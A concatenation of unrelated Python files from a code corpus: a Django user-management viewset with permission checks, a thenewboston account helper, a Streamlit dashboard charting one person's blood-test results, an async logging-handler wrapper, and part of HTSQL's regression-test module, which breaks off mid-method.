from backend.api.serializers import UsuarioSerializer
class UsuarioViewSet(viewsets.ViewSet):
"""
UsuarioViewSet View para el modelo Usuario
Args:
viewsets (module): tipo de clase basado en view
"""
@action(detail=False, methods=['GET'])
def me(self, request):
"""Obtiene el usuario autenticado
Args:
request (Any): request
"""
usuario_request = Usuario.objects.get(user=request.user)
serializer = UsuarioSerializer(usuario_request, many=False)
return Response(serializer.data)
def list(self, request):
"""
list Lista todos los usuarios del sistema
Args:
request (Any): request
Returns:
json: lista de usuarios en formato json
"""
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuarios = Usuario.objects.all()
serializer = UsuarioSerializer(usuarios, many=True)
return Response(serializer.data)
def retrieve(self, request, pk=None):
"""
retrieve Obtiene un usuario mediante su pk
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario obtenido en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def activar(self, request, pk=None):
"""
activar Activa el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario activado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("activar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["activar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
usuario.activar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def desactivar(self, request, pk=None):
"""
desactivar Desactiva el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario desactivado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("desactivar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["desactivar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
if usuario_request == usuario:
response = {"message": "No puedes desactivarte a ti mismo"}
return Response(response, status=status.HTTP_409_CONFLICT)
if MiembroSprint.pertenece_a_sprint_activo(usuario):
response = {
"message": "Este usuario pertenece a un Sprint Activo",
"error": "conflict"
}
return Response(response, status=status.HTTP_409_CONFLICT)
usuario.desactivar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def asignar_rol(self, request, pk=None):
"""
asignar_rol Asigna un rol a un usuario
Args:
request (Any): request
pk (int, opcional): primary key. Defaults to None.
Returns:
json: html response
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
usuario = Usuario.objects.get(pk=pk)
if not (usuario_request.tiene_permiso("ver_usuarios") and usuario_request.tiene_permiso("ver_roles")
and usuario_request.tiene_permiso("asignar_roles")):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": [
"ver_usuarios",
"ver_roles",
"asignar_roles"
]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
if usuario_request == usuario:
response = {"message": "No puede asignarse roles a sí mismo"}
return Response(response, status=status.HTTP_403_FORBIDDEN)
rol = Rol.objects.get(pk=request.data['id'])
usuario.asignar_rol(rol)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
except Rol.DoesNotExist:
response = {"message": "No existe el rol"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
|
nilq/baby-python
|
python
|
from thenewboston.accounts.manage import create_account
from thenewboston.verify_keys.verify_key import encode_verify_key
def random_encoded_account_number():
signing_key, account_number = create_account()
return encode_verify_key(verify_key=account_number)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import streamlit as st
import numpy as np
import pandas as pd
import altair as alt
from io import BytesIO
def to_excel(df):
output = BytesIO()
writer = pd.ExcelWriter(output, engine='xlsxwriter')
df.to_excel(writer, index=True, sheet_name='杜子期血常规数据统计')
workbook = writer.book
worksheet = writer.sheets['杜子期血常规数据统计']
format1 = workbook.add_format({'num_format': '0.00'})
worksheet.set_column('A:Z', None, format1)
writer.save()
processed_data = output.getvalue()
return processed_data
st.set_page_config(layout='wide')
pd.set_option("display.max_colwidth", 1000, 'display.width', 1000)
def highlight_dataframe(s):
lst = []
for i in range(0, len(s) - 1, 2):
try:
tmp = float(s[i])
min, max = s[i+1].split('~')
if tmp < float(min):
lst.append('color: orange')
elif tmp > float(max):
lst.append('color: red')
else:
lst.append('')
except Exception as e:
lst.append('')
#print(s[i], s[i+1], e)
lst.append('')
return lst
items_map = {
'白细胞计数(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)',
'淋巴细胞绝对值(LYM#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
'中性粒细胞绝对值(NEU#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
'单核细胞绝对值(MON#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
'嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
'嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
'红细胞体积分布宽度-CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
'红细胞体积分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
'血小板体积分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
'血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
'血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
'嗜碱性粒细胞百分比(BAS%)(BAS%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
'嗜酸性粒细胞百分比(EO%)(EOS%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
'红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
'血红蛋白浓度(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
'红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
'平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
'平均红细胞血红蛋白含量(MCH)(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
'平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
'血小板计数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
'淋巴细胞百分比(LYM%)(%)': '淋巴细胞百分比(LYM%)(%)',
'中性粒细胞百分比(NEU%)(%)': '中性粒细胞百分比(NEU%)(%)',
'单核细胞百分比(MON%)(%)': '单核细胞百分比(MON%)(%)',
'大血小板比率(P-LC,R)': '大血小板比率(P-LC,R)',
'嗜碱性粒细胞计数(BASO#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
'血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
'中性粒细胞计数(NEUT#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
'中性粒细胞百分比(NEUT%)(%)': '中性粒细胞百分比(NEU%)(%)',
'血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
'血小板分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
'大血小板比率(P-LCR)': '大血小板比率(P-LC,R)',
'血小板总数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
'红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
'红细胞分布宽度CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
'红细胞分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
'单核细胞百分比(MONO%)(%)': '单核细胞百分比(MON%)(%)',
'单核细胞计数(MONO#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
'平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
'嗜碱性粒细胞百分比(BASO%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
#'C-反应蛋白(CRP)(mg/L)',
'嗜酸性粒细胞计数(EO#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
'嗜酸性粒细胞百分比(EO%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
'红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
'血红蛋白(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
'淋巴细胞计数(LYMPH#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
'淋巴细胞百分比(LYMPH%)(%)': '淋巴细胞百分比(LYM%)(%)',
'平均血红蛋白含量(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
'平均血红蛋白浓度(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
'白细胞数目(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)'
}
items = set(items_map.values())
items_ref = [x + '_参考范围' for x in items]
df = pd.read_excel('杜子期血常规.xlsx', engine='openpyxl')
df_new = pd.DataFrame([], index=[rv for r in zip(items, items_ref) for rv in r])
for index, row in df.iteritems():
df_new[index] = ''
for i, item in enumerate(row):
if item in items_map:
try:
df_new[index][items_map[item]] = float(row[i + 1])
except:
df_new[index][items_map[item]] = np.nan
df_new[index][items_map[item] + '_参考范围'] = row[i + 2]
df_new.columns = np.array([x.date() for x in df_new.columns])
st.title('杜子期血常规数据统计')
df_new_str = df_new.astype(str)
st.write(df_new_str.style.apply(highlight_dataframe, axis=0))
st.download_button("Export to Excel", data=to_excel(df_new), file_name='杜子期血常规数据统计.xlsx')
chart_items = set()
#other = st.sidebar.expander('其他选项')
#if other.checkbox('显示原始数据'):
# st.write(df)
#st.sidebar.write('')
st.sidebar.write('请选择画图项')
if st.sidebar.checkbox('所有项'):
chart_items = set(items)
for item in items:
if st.sidebar.checkbox(item):
chart_items.add(item)
if chart_items:
df = df_new.loc[chart_items, :].T
#df.index = df.index.to_numpy(dtype='datetime64')
st.line_chart(df)
else:
df = df_new.loc['血小板计数(PLT)(10^9/L)', :].T
st.line_chart(df_new.loc['血小板计数(PLT)(10^9/L)'].T)
#df = df_new.loc['血小板计数(PLT)(10^9/L)'].T
df = df_new.T
df['date'] = df.index
st.vega_lite_chart(data=df, spec={
'mark': {
'type': 'line',
'point': True,
'tooltip': True
},
'encoding': {
'x': {
"type": "temporal",
#'timeUnit': 'date',
'field': 'date',
},
'y': {
"type": "quantitative",
'field': '血小板计数(PLT)(10^9/L)'
#'field': list(chart_items)
}
}
}, use_container_width=True)
st.write('相关系数矩阵')
df = df_new.filter(regex='^((?!_参考范围$).)*$', axis=0).astype(float)
st.write(df.T.corr())
cor_data = df.T.corr().stack().reset_index().rename(columns={0: 'correlation', 'level_0': 'variable', 'level_1': 'variable2'})
cor_data['correlation_label'] = cor_data['correlation'].map('{:.2f}'.format)
base = alt.Chart(cor_data).encode(
x='variable2:O',
y='variable:O'
)
# Text layer with correlation labels
# Colors are for easier readability
text = base.mark_text().encode(
text='correlation_label',
color=alt.condition(
alt.datum.correlation > 0.5,
alt.value('white'),
alt.value('black')
)
)
# The correlation heatmap itself
cor_plot = base.mark_rect().encode(
color='correlation:Q'
)
st.altair_chart(cor_plot + text, use_container_width=True)
|
nilq/baby-python
|
python
|
import asyncio
import logging
import logging.handlers
import time
from contextlib import suppress
from typing import Optional, Union
from ..thread_pool import run_in_new_thread
def _thread_flusher(
handler: logging.handlers.MemoryHandler,
flush_interval: Union[float, int],
loop: asyncio.AbstractEventLoop,
) -> None:
def has_no_target() -> bool:
return True
def has_target() -> bool:
return bool(handler.target) # type: ignore
is_target = has_no_target
if isinstance(handler, logging.handlers.MemoryHandler):
is_target = has_target
while not loop.is_closed() and is_target():
with suppress(Exception):
if handler.buffer:
handler.flush()
time.sleep(flush_interval)
def wrap_logging_handler(
handler: logging.Handler,
loop: Optional[asyncio.AbstractEventLoop] = None,
buffer_size: int = 1024,
flush_interval: Union[float, int] = 0.1,
) -> logging.Handler:
loop = loop or asyncio.get_event_loop()
buffered_handler = logging.handlers.MemoryHandler(
buffer_size,
target=handler,
flushLevel=logging.CRITICAL,
)
run_in_new_thread(
_thread_flusher, args=(
buffered_handler, flush_interval, loop,
), no_return=True,
)
return buffered_handler
|
nilq/baby-python
|
python
|
#
# Copyright (c) 2006-2013, Prometheus Research, LLC
#
"""
:mod:`htsql.ctl.regress`
========================
This module implements the `regress` routine.
"""
from .error import ScriptError
from .routine import Argument, Routine
from .option import (InputOption, TrainOption, PurgeOption,
ForceOption, QuietOption)
from .request import Request
from ..core.validator import (Validator, BoolVal, StrVal, WordVal,
ChoiceVal, IntVal, UFloatVal, DBVal, SeqVal,
MapVal, ClassVal, AnyVal)
from ..core.util import maybe, trim_doc, DB
import traceback
import io
import sys
import os, os.path
import shutil
import re
import difflib
import tempfile
import subprocess
import atexit
import time
import yaml, yaml.constructor
# Indicates that a field has no default value and therefore cannot be omitted.
MANDATORY_FIELD = object()
# Return values for `ask_*` methods indicating the user-chosen action.
DO_CONTINUE = object()
DO_DISCARD = object()
DO_HALT = object()
DO_RECORD = object()
DO_SAVE = object()
DO_SKIP = object()
class TermStringIO(io.StringIO):
"""
A readable file-like object with an "echo". Whenever some content is read
from it, the same content is echoed to the specified `output` stream.
Use :class:`TermStringIO` to preserve the content of interactive
sessions with pre-recorded input. Assign::
sys.stdout = StringIO.StringIO()
sys.stdin = TermStringIO(input, sys.stdout)
where `input` contains the pre-recorded input data. After the
session is done, the content of `sys.stdout` will be the same as
if the session was performed on a real terminal with echo enabled.
`buf` (a string)
The content of the stream.
`output` (a writable file-like object)
A stream that records data being read.
"""
def __init__(self, buf, output):
io.StringIO.__init__(self, buf)
self.output = output
def read(self, n=-1):
data = io.StringIO.read(self, n)
self.output.write(data)
return data
def readline(self, length=None):
data = io.StringIO.readline(self, length)
self.output.write(data)
return data
class Field(object):
"""
Describes a parameter of test data.
`attribute` (a string)
The name of the attribute that contains the field value.
`val` (:class:`htsql.validator.Validator`)
The validator for the field values.
`default`
The default value of the field. If not provided, the field
cannot be omitted. The `is_mandatory` attribute indicates if
the `default` value is provided.
`hint` (a string or ``None``)
A short one-line description of the field.
"""
# Use it to filter out `AnyField` instances.
is_any = False
def __init__(self, attribute, val,
default=MANDATORY_FIELD, hint=None):
# Sanity check on the arguments.
assert isinstance(attribute, str)
assert re.match(r'^[a-zA-Z_][0-9a-zA-Z_]*$', attribute)
assert isinstance(val, Validator)
assert isinstance(hint, maybe(str))
self.attribute = attribute
self.val = val
self.default = default
self.is_mandatory = (default is MANDATORY_FIELD)
self.hint = hint
def get_hint(self):
"""
Returns short one-line description of the field.
"""
return self.hint
def get_signature(self):
"""
Returns the field name.
"""
signature = self.attribute.replace('_', '-')
if self.is_mandatory:
signature += '*'
return signature
class AnyField(object):
"""
Indicates that test data may contain extra fields.
Add ``AnyField()`` to the `fields` list to indicate that YAML
representation of test data may contain some attributes not
described by other fields. These extra attributes will be
silently ignored.
"""
# Use it to filter out `AnyField` instances.
is_any = True
class TestData(object):
"""
Represents input or output data of a test case.
This is an abstract class. Create a subclass of :class:`TestData`
to describe input or output data for a specific test kind. You need
to specify the format of test data using the `fields` class attribute.
The `fields` attribute is a list of :class:`Field` instances. Each
field describes an attribute of test data.
Instances if :class:`TestData` are YAML-serializable. A instance of
a :class:`TestData` subclass is represented as a mapping YAML node.
The sets of keys and the format of the values come from the `fields`
list. Add an :class:`AnyField` instance to `fields` to indicate
that the mapping node may contain some extra fields (which are to
be ignored).
The constructor of :class:`TestData` accepts the following arguments:
`routine` (:class:`RegressRoutine`)
The routine that started the testing.
`case_class` (a subclass of :class:`TestCase`)
A test type. The object being constructed is an instance
of either `case_class.Input` or `case_class.Output`.
`attributes` (a dictionary)
A dictionary of attributes and their values. The set of
attributes is declared using the `fields` class variable.
`location` (a string or ``None``)
When the test data is loaded from a YAML file, `location`
indicates the location of the corresponding YAML node.
"""
fields = []
def __init__(self, routine, case_class, attributes, location=None):
# Sanity check on the arguments.
assert isinstance(routine, RegressRoutine)
assert issubclass(case_class, TestCase)
assert self.__class__ in [case_class.Input, case_class.Output]
assert isinstance(attributes, dict)
assert isinstance(location, maybe(str))
self.routine = routine
self.case_class = case_class
for name in attributes:
setattr(self, name, attributes[name])
self.location = location
self.init_attributes()
def init_attributes(self):
"""
Normalize field values.
"""
# Override in a subclass if you need to massage some field values.
def __str__(self):
# Produces the value of the first mandatory field.
title_attribute = None
for field in self.fields:
if field.is_any:
continue
if field.is_mandatory:
title_attribute = field.attribute
if title_attribute is None:
return ''
return repr(getattr(self, title_attribute))
def __repr__(self):
return "<%s.%s %s>" % (self.case_class.__name__,
self.__class__.__name__, self)
class TestCase(object):
"""
Describes a test type.
This an abstract class. Create a subclass of :class:`TestCase`
to describe a new type of test case. When subclassing, define
the following class attributes:
`name` (a string)
The name of the test.
`hint` (a string)
Short one-line description of the test.
`help` (a string)
Long description of the test.
`Input` (a subclass of :class:`TestData`)
The format of the test input.
`Output` (a subclass of :class:`TestData` or ``None``)
The format of the test output.
You also need to override methods :meth:`verify` and :meth:`train`
to specify how to execute the test case in a normal and in a train mode.
The constructor of :class:`TestCase` takes the following arguments:
`routine` (:class:`RegressRoutine`)
The routine that started the testing.
`state`
An object keeping the mutable testing state.
`input` (an instance of `Input`)
Input test data.
`output` (an instance of `Output` or ``None``)
Expected output test data.
"""
name = None
hint = None
help = None
# Override to declare the format of input and output test data.
Input = None
Output = None
@classmethod
def get_hint(cls):
"""
Returns short one-line description of the test case.
"""
return cls.hint
@classmethod
def get_help(cls):
"""
Returns long description of the test case.
"""
# Produce:
# {help}
#
# Input data:
# {field.signature} - {field.hint}
# ...
#
# Output data:
# {field.signature} - {field.hint}
# ...
lines = []
help = trim_doc(cls.help)
if help is not None:
lines.append(help)
for data_class in [cls.Input, cls.Output]:
if data_class is None:
continue
if lines:
lines.append("")
lines.append("%s data:" % data_class.__name__)
for field in data_class.fields:
if field.is_any:
continue
signature = field.get_signature()
hint = field.get_hint()
if hint is not None:
lines.append(" %-24s : %s" % (signature, hint))
else:
lines.append(" %s" % signature)
return "\n".join(lines)
def __init__(self, routine, state, input, output):
# Sanity check on the arguments.
assert isinstance(routine, RegressRoutine)
assert isinstance(state, routine.state_class)
if self.Input is None:
assert input is None
else:
assert isinstance(input, self.Input)
if self.Output is None:
assert output is None
else:
assert isinstance(output, maybe(self.Output))
self.routine = routine
self.state = state
self.input = input
self.output = output
# When the test case is in the quiet mode (indicated by `is_quiet`),
# all output is redirected to `quiet_buffer`. If for some reason
# the test case leaves the quiet mode, all the accumulated data
# is dumped to the standard output stream.
self.is_quiet = routine.quiet
self.quiet_buffer = io.StringIO()
def make_output(self, **attributes):
# Generate a new test output record with the given attributes.
return self.Output(self.routine, self.__class__, attributes)
@classmethod
def matches(cls, input, output):
"""
Checks if the given input and output records belong to the same
test case.
Note that we assume that both test input and test output have
a field with the same attribute name. This attribute is called
the key attribute. Input data matches output data when the
values of their key attribute are equal.
"""
# Sanity check on the arguments.
assert isinstance(input, maybe(TestData))
assert isinstance(output, maybe(TestData))
# `input` and `output` must be instances of `Input` and `Output`
# classes of the test case.
if cls.Input is None or cls.Output is None:
return False
if not isinstance(input, cls.Input):
return False
if not isinstance(output, cls.Output):
return False
# Find the key attribute: one that is declared both as an input field
# and as an output field.
key_attribute = None
input_attributes = [field.attribute for field in cls.Input.fields
if not field.is_any]
output_attributes = [field.attribute for field in cls.Output.fields
if not field.is_any]
for attribute in input_attributes:
if attribute in output_attributes:
key_attribute = attribute
break
if key_attribute is None:
return False
# `input` and `output` are matched when the values of their key
# attributes are equal.
if getattr(input, key_attribute) != getattr(output, key_attribute):
return False
return True
def get_suites(self):
"""
For container test cases, returns a set of test suites that belong
to the test case; otherwise returns an empty set.
"""
return set()
def out(self, *values, **options):
"""
Print values to the standard output stream.
:meth:`out` supports the same options as
:meth:`htsql.ctl.script.Script.out` and an extra option:
`indent`
A number of spaces to print before the first value,
default is ``0``.
"""
indent = options.pop('indent', 0)
if indent:
values = (' '*(indent-1),) + values
# If the test case is in the quiet mode, redirect the output
# to `quiet_buffer`.
if self.is_quiet and 'file' not in options:
options['file'] = self.quiet_buffer
self.routine.ctl.out(*values, **options)
def ask(self, message, choices):
"""
Asks the user a question; returns the reply.
`message` (a string)
The question.
`choices` (a list of strings)
The list of valid replies.
Typically the question has the form::
Press ENTER to perform <the default action>,
'x'+ENTER to perform <another action>,
'y'+ENTER to perform <another action>,
'z'+ENTER to perform <another action>.
In this case, `choices` should be equal to::
['', 'x', 'y', 'z']
The reply is stripped of leading and trailing whitespaces
and translated to the lower case.
"""
# Leave the quiet mode and print the question.
self.force_out()
self.out()
self.out(">>>", message)
line = None
# Repeat till we get a valid answer.
while line not in choices:
self.out("> ", end='')
line = self.routine.ctl.stdin.readline().strip().lower()
return line
def ask_halt(self):
"""
Ask if the user wants to halt the tests.
Returns `DO_HALT` or `DO_CONTINUE`.
"""
line = self.ask("Press ENTER to halt,"
" 'c'+ENTER to continue", ['', 'c'])
if line == '':
return DO_HALT
if line == 'c':
return DO_CONTINUE
def ask_record(self):
"""
Ask if the user wants to remember the new output of a test case.
Returns `DO_RECORD`, `DO_SKIP`, or `DO_HALT`.
"""
line = self.ask("Press ENTER to record,"
" 's'+ENTER to skip,"
" 'h'+ENTER to halt", ['', 's', 'h'])
if line == '':
return DO_RECORD
if line == 's':
return DO_SKIP
if line == 'h':
return DO_HALT
def ask_save(self):
"""
Ask if the user wants to save the updated output data.
Returns `DO_SAVE` or `DO_DISCARD`.
"""
line = self.ask("Press ENTER to save changes,"
" 'd'+ENTER to discard changes", ['', 'd'])
if line == '':
return DO_SAVE
if line == 'd':
return DO_DISCARD
def out_exception(self, exc_info):
"""
Prints an exception traceback.
"""
# Obey the quiet mode: redirect to `quiet_buffer` if necessary.
if self.is_quiet:
file = self.quiet_buffer
else:
file = self.routine.ctl.stdout
exc_type, exc_value, exc_traceback = exc_info
traceback.print_exception(exc_type, exc_value, exc_traceback,
file=file)
def out_sep(self, sep="-", length=72):
"""
Prints a separator: a long line of dashes.
"""
self.out(sep*length)
def out_header(self):
"""
Prints a nice header describing the test case.
"""
# Print:
# ---------------- ... -
# {NAME} {value}
# ({input.location})
# where {value} is the value of the first field of the input data.
self.out_sep()
if not self.input.fields or self.input.fields[0].is_any:
return
attribute = self.input.fields[0].attribute
value = getattr(self.input, attribute)
if value is not None:
if isinstance(value, list):
value = " ".join(str(item) for item in value)
self.out("%s %s" % (self.name.upper(), value), indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def halted(self, message=None):
"""
Indicate that the test case failed and stop the tests.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.failed += 1
self.state.is_exiting = True
def failed(self, message=None):
"""
Indicate that the test case failed; stop the tests unless
``--force`` or ``--train`` flags are set.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.failed += 1
if not (self.routine.force or self.routine.train):
self.state.is_exiting = True
def updated(self, message=None):
"""
Indicate that the output of the test case has been updated.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.updated += 1
def passed(self, message=None):
"""
Indicate that the test case passed.
"""
if message is not None:
self.out(message)
self.state.passed += 1
def force_out(self):
# Leave the quiet mode; flush the content of `quiet_buffer`
# to the standard output stream.
if not self.is_quiet:
return
self.is_quiet = False
buffer = self.quiet_buffer.getvalue()
self.routine.ctl.stdout.write(buffer)
self.routine.ctl.stdout.flush()
def verify(self):
"""
Executes the test case.
This method runs the test case with the given input data.
If the test completed without errors, compare the produced
output with the given expected output.
The test case fails if
- the test failed to complete without errors;
- or the expected test output is not provided;
- or the expected test output is not equal to the actual test output.
Some test cases may not generate output; in this case the test
passes if it is completed without errors.
"""
# Override when subclassing.
raise ScriptError("test %r is not implemented" % self.name)
def train(self):
"""
Executes the test case in the training mode; returns the output data.
In the train mode, when the expected test output is not equal to the
actual test output, the user is given a choice to update the expected
test output.
Note that when the output has not been changed or the user refused
to update it, the method must return the original output data,
``self.output``.
"""
# Override when subclassing if the test case requires test output data.
# Otherwise, just run the test case in the normal mode.
self.verify()
return None
class SkipTestCase(TestCase):
"""
Implements a skippable test case.
This is an abstract mixin class; subclasses should call :meth:`skipped`
to check if the test case is enabled or not.
"""
class Input(TestData):
fields = [
Field('skip', BoolVal(), False,
hint="""do not run the test"""),
Field('ifdef', SeqVal(StrVal()), None,
hint="""run only if a given toggle is active"""),
Field('ifndef', SeqVal(StrVal()), None,
hint="""run only if a given toggle is inactive"""),
]
def skipped(self):
"""
Checks if the test is disabled.
"""
# Verify if the test is unconditionally disabled.
if self.input.skip:
return True
# If a positive guard is set, check that at least one of the required
# toggles is active.
if self.input.ifdef is not None:
if not (self.state.toggles & set(self.input.ifdef)):
return True
# If a negative guard is set, check that none of the suppressed
# toggles is active.
if self.input.ifndef is not None:
if self.state.toggles & set(self.input.ifndef):
return True
# The test is not skipped.
return False
class DefineTestCase(SkipTestCase):
"""
Activates a named toggle.
"""
name = "define"
hint = """activate a toggle"""
help = """
This test case activates a toggle variable. A toggle allows one
to conditionally enable or disable some test cases using `ifdef`
and `ifndef` directives.
"""
class Input(TestData):
fields = [
Field('define', SeqVal(StrVal()),
hint="""activate the given toggles"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Activates the toggles.
for toggle in self.input.define:
self.state.toggles.add(toggle)
class RunAndCompareTestCase(SkipTestCase):
"""
Implements common methods for a broad category of test cases.
This class implements common scenario: run the test, get the output
and compare it with the expected output.
This is an abstract class; create a subclass to implement a concrete
test case. The following methods has to be overridden: :meth:`execute`,
:meth:`render` and :meth:`differs`.
"""
def out_lines(self, lines, indent=0):
"""
Prints the lines with the specified identation.
"""
for line in lines:
# If `line` is UTF-8 encoded, print it literally;
# otherwise, replace special and non-ASCII characters
# with dots.
try:
line.decode('utf-8')
except UnicodeDecodeError:
line = re.sub(r'[\x00-\x1F\x7E-\xFF]', '.', line)
self.out(line.rstrip(), indent=indent)
def out_diff(self, old_output, new_output):
"""
Prints the delta between two test outputs.
"""
# Sanity check on the arguments.
assert isinstance(old_output, maybe(self.Output))
assert isinstance(new_output, self.Output)
# Render the outputs to the lists of lines.
old_lines = self.render(old_output)
new_lines = self.render(new_output)
# This function is supposed to be called in two cases:
# when there is no expected output, but only the actual output,
# and when the expected output differs from the actual output.
# However it may also happen that the function is called with
# two identical outputs, or that the `render` method hides
# the difference.
if old_lines is None:
self.out("=== the test output is new")
elif old_lines != new_lines:
self.out("=== the test output is changed")
else:
self.out("=== the test output is not changed")
self.out()
# Display the actual output if there is no expected output;
# otherwise display the delta between the expected and the actual
# output in the unified diff format.
if old_lines is None or old_lines == new_lines:
lines = new_lines
else:
diff = difflib.unified_diff(old_lines, new_lines,
n=2, lineterm='')
# Strip the leading `---` and `+++` lines of the unified diff.
lines = list(diff)[2:]
self.out_lines(lines, indent=2)
def render(self, output):
"""
Converts the output data to a list of lines.
"""
# Override when subclassing.
raise NotImplementedError()
def execute(self):
"""
Runs the test case; returns the produced output.
Returns ``None`` if an error occured when running the test case.
"""
# Override when subclassing.
raise NotImplementedError()
def differs(self, old_output, new_output):
"""
Checks if the actual test output differs from the expected test output.
"""
# Override when subclassing.
raise NotImplementedError()
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# When no expected test output, fail without executing the test.
if self.output is None:
return self.failed("*** no output data found")
# Execute the test; get the actual test output.
new_output = self.execute()
# `None` indicates that an error occurred; `execute()` is responsible
# for displaying an error message, so we just update the status and
# exit.
if new_output is None:
return self.failed()
# Compare the expected and the actual outputs, fail if they are
# different.
if self.differs(self.output, new_output):
self.out_diff(self.output, new_output)
return self.failed("*** unexpected test output")
# The actual output coincides with the expected output; we are good.
return self.passed()
def train(self):
# Check if the test is skipped.
if self.skipped():
return self.output
# Display the header.
self.out_header()
# Execute the test; get the actual test output.
new_output = self.execute()
# We need to handle three possible outcomes: an error occurred
# when running the test, the expected output differs from the
# actual output and the expected output coincides with the actual
# output.
# An error occurred while running the test.
if new_output is None:
# Ask the user if they want to stop the testing; the expected
# output is not updated.
reply = self.ask_halt()
if reply is DO_HALT:
self.halted("*** halting")
else:
self.failed()
return self.output
# The actual output differs from the expected output.
if self.differs(self.output, new_output):
# Display the difference.
self.out_diff(self.output, new_output)
# Ask the user if they want to record the new output,
# keep the old output, or halt the testing.
reply = self.ask_record()
if reply is DO_HALT:
self.halted("*** halting")
return self.output
if reply is DO_RECORD:
if self.output is None:
